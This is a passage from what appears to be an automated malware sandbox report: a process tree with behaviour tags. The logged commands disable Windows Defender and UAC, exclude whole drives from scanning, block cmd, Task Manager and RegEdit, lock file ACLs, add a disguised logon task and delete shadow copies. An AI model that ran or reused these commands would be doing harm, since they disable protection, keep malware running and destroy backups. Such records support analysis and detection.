      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /f
        6⤵
        
        PID:2524
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        6⤵
        
        PID:3040
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f
        6⤵
        Disables cmd.exe use via registry modification
        Modifies registry key
        
        PID:1120
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4692
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /f
        6⤵
        
        PID:1848
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f"
        6⤵
        
        PID:2956
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10048
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.exe'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3664
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
        6⤵
        Modifies Windows Defender Real-time Protection settings
        
        PID:3436
      - C:\Windows\SYSTEM32\netsh.exe
        
        netsh wlan show profiles
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1708
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.bat'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4020
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /f
        6⤵
        
        PID:2472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.vbs'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1752
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
        6⤵
        
        PID:2676
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /f
        6⤵
        
        PID:1368
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        6⤵
        
        PID:1420
        
        C:\Windows\system32\tasklist.exe
        
        tasklist
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:9840
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.py'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4512
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-MpPreference -ExclusionPath '.pyw'"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3740
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableCloudProtection /t REG_DWORD /d 1 /f
        6⤵
        
        PID:2348
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo Y | winget list"
        6⤵
        
        PID:3952
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y "
        7⤵
        
        PID:9780
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /f
        6⤵
        
        PID:4812
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Behavior Monitoring" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
        6⤵
        
        PID:2336
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2928
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /f
        6⤵
        
        PID:4924
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableNetworkProtection /t REG_DWORD /d 1 /f
        6⤵
        
        PID:2536
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /f
        6⤵
        
        PID:3732
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiVirusSignatures /t REG_DWORD /d 1 /f
        6⤵
        
        PID:3704
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /f
        6⤵
        
        PID:1724
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAccess /t REG_DWORD /d 1 /f
        6⤵
        
        PID:2440
      - C:\Windows\SYSTEM32\reg.exe
        
        reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /f
        6⤵
        
        PID:4712
      - C:\Windows\SYSTEM32\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableSecurityCenter /t REG_DWORD /d 1 /f
        6⤵
        
        PID:5140
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"
        6⤵
        
        PID:10096
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:5560
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f"
        6⤵
        
        PID:6508
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /f
        7⤵
        Modifies registry key
        
        PID:7040
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f"
        6⤵
        
        PID:7076
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        Modifies registry key
        
        PID:5708
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /f /im firefox.exe"
        6⤵
        
        PID:4104
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /f /im firefox.exe
        7⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5268
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users" /grant %username%:F"
        6⤵
        
        PID:904
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users" /grant Admin:F
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6148
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f"
        6⤵
        
        PID:6204
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "ONEDRIVE-SERVICE" /tr "C:\Users\windowssystem\starter.exe" /sc onlogon /f
        7⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:6244
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)"
        6⤵
        
        PID:6268
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-1-0:(D)
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6320
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)"
        6⤵
        
        PID:6344
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-5-32-544:(D)
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6392
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)"
        6⤵
        
        PID:6420
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Users\windowssystem" /deny *S-1-5-32-545:(D)
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6468
      - C:\Windows\SYSTEM32\setx.exe
        
        setx PATH "C:\$Sys-Manager;C:\Users\Admin\AppData\Local\Temp\_MEI22362\pywin32_system32;C:\Users\Admin\AppData\Local\Temp\_MEI11602\pywin32_system32;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\dotnet\;C:\Users\Admin\AppData\Local\Microsoft\WindowsApps;"
        6⤵
        
        PID:6488
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c takeown /f C:\Windows\System32\drivers\etc\hosts
        6⤵
        
        PID:6516
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\drivers\etc\hosts
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6800
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f"
        6⤵
        
        PID:6528
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\SYSTEM\CurrentControlSet\Control\Power /v PowerButtonAction /t REG_DWORD /d 0 /f
        7⤵
        Modifies registry key
        
        PID:6820
      - C:\Windows\SYSTEM32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        6⤵
        Interacts with shadow copies
        
        PID:6580
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f"
        6⤵
        
        PID:6612
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        7⤵
        Disables RegEdit via registry modification
        Modifies registry key
        
        PID:6832
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
        6⤵
        
        PID:6856
        
        C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\drivers\etc\hosts /remove "NT AUTHORITY\TrustedInstaller"
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:6992
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Checkpoint-Computer -Description \"Windows Update\" -RestorePointType \"MODIFY_SETTINGS\""
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:7060
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo %COMPUTERNAME%"
        6⤵
        
        PID:7612
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7700
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profiles
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7808
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "echo %USERNAME%"
        6⤵
        
        PID:7772
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show interfaces"
        6⤵
        
        PID:7904
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show interfaces
        7⤵
        Event Triggered Execution: Netsh Helper DLL
        
        PID:7932
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" virustotal.com
        6⤵
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of SetWindowsHookEx
        
        PID:7844
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9f1e23cb8,0x7ff9f1e23cc8,0x7ff9f1e23cd8
        7⤵
        
        PID:7740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1976 /prefetch:2
        7⤵
        Suspicious use of SetWindowsHookEx
        
        PID:7992
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2024 /prefetch:3
        7⤵
        
        PID:6732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
        7⤵
        
        PID:8160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3176 /prefetch:1
        7⤵
        
        PID:8332
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1
        7⤵
        
        PID:8244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1964,4765342493682662998,9624259659220032397,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5292 /prefetch:8
        7⤵
        
        PID:1980
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3152
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1656
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2160
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:1588
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3932
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:2588
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4564
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2080
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3564
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4552
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3056
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:424
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:1580
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4312
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4252
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:436
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3528
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:4108
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5724
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5360
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5368
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:5404
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5420
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5428
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:5464
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5980
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5988
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:5240
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5252
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:6260
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7388
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7392
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7444
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7476
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7484
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:912
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7548
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3900
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:7580
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7868
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7876
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:4056
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:7988
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:7996
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8040
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:8064
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8068
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8132
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5756
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5764
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8216
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8260
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8268
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8376
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8424
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8432
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:8468
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8588
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8596
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8644
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8692
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8700
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:8736
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:8764
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8772
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8808
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:8844
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8828
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8876
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8896
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8912
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:8944
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:8972
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:8980
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9024
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9060
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9068
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9136
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9144
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      Delays execution with timeout.exe
      PID:9176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:4776
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:5872
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9252
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9292
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9300
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:2748
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9352
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:9360
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:9396
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3568
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:3756
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:5128
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:3056
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
      PID:1368
  - - C:\Windows\system32\timeout.exe
      timeout /t 1
      4⤵
      PID:3712
  - - C:\Windows\system32\tasklist.exe
      tasklist /FI "IMAGENAME eq systemservice92.exe"
      4⤵
      PID:9592
  - - C:\Windows\system32\find.exe
      find /I "systemservice92.exe"
      4⤵
